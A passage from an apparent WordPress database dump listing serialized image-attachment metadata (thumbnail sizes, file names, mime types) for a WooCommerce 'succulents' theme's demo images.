:348;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"about-us-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(826,4235,'_wp_attachment_image_alt','a'),(827,1547,'_wp_attachment_image_alt','a'),(828,905,'_wp_attached_file','2018/01/h5-slider-graphic-3.jpg'),(829,905,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:720;s:4:\"file\";s:31:\"2018/01/h5-slider-graphic-3.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h5-slider-graphic-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-3-600x225.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-3-300x113.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"h5-slider-graphic-3-1024x384.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-3-768x288.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:288;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"h5-slider-graphic-3-1536x576.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"h5-slider-graphic-3-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-3-550x720.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"h5-slider-graphic-3-1100x720.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h5-slider-graphic-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-3-600x225.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(830,1177,'_wp_attached_file','2018/01/product5-gallery1.jpg'),(831,1177,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product5-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product5-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product5-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product5-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product5-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product5-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product5-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product5-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product5-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product5-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product5-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product5-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(832,1548,'_wp_attached_file','2018/01/h7-img-5.jpg'),(833,1548,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:402;s:4:\"file\";s:20:\"2018/01/h7-img-5.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h7-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h7-img-5-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h7-img-5-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h7-img-5-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h7-img-5-550x402.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h7-img-5-550x402.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h7-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(834,1173,'_wp_attachment_image_alt','a'),(835,1177,'_wp_attachment_image_alt','a'),(836,1178,'_wp_attached_file','2018/01/product5-gallery2.jpg'),(837,1178,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product5-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product5-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product5-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product5-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product5-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product5-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product5-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product5-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product5-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product5-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product5-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product5-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(838,4239,'_wp_attachment_image_alt','a'),(839,154,'_wp_attachment_image_alt','o'),(840,4241,'_wp_attached_file','2018/03/landing-home3-img-1.jpg'),(841,4241,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:472;s:4:\"file\";s:31:\"2018/03/landing-home3-img-1.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-home3-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home3-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"landing-home3-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-home3-img-1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home3-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"landing-home3-img-1-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"landing-home3-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"landing-home3-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"landing-home3-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"landing-home3-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"landing-home3-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"landing-home3-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home3-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(842,164,'_wp_attached_file','2018/01/h1-img7.png'),(843,164,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:90;s:6:\"height\";i:26;s:4:\"file\";s:19:\"2018/01/h1-img7.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(844,164,'_wp_attachment_image_alt','a'),(845,166,'_wp_attached_file','2018/01/404-title-img.png'),(846,166,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:65;s:6:\"height\";i:52;s:4:\"file\";s:25:\"2018/01/404-title-img.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(847,166,'_wp_attachment_image_alt','o'),(848,184,'_wp_attached_file','2018/01/h1-img8.jpg'),(849,184,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:908;s:4:\"file\";s:19:\"2018/01/h1-img8.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"h1-img8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h1-img8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"h1-img8-198x300.jpg\";s:5:\"width\";i:198;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h1-img8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"h1-img8-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"h1-img8-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"h1-img8-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:19:\"h1-img8-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:19:\"h1-img8-550x908.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:908;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"h1-img8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h1-img8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(850,1177,'_wp_attachment_image_alt','a'),(851,1178,'_wp_attachment_image_alt','a'),(852,1548,'_wp_attachment_image_alt','a'),(853,4238,'_wp_attachment_image_alt','a'),(854,4241,'_wp_attachment_image_alt','a'),(855,1179,'_wp_attached_file','2018/01/product5-gallery3.jpg'),(856,1179,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product5-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product5-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product5-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product5-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product5-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product5-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product5-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product5-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product5-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product5-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product5-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product5-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(857,4242,'_wp_attached_file','2018/03/landing-home5-img-1.jpg'),(858,4242,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:472;s:4:\"file\";s:31:\"2018/03/landing-home5-img-1.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-home5-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home5-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"landing-home5-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-home5-img-1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home5-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"landing-home5-img-1-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"landing-home5-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"landing-home5-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"landing-home5-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"landing-home5-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"landing-home5-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"landing-home5-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home5-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\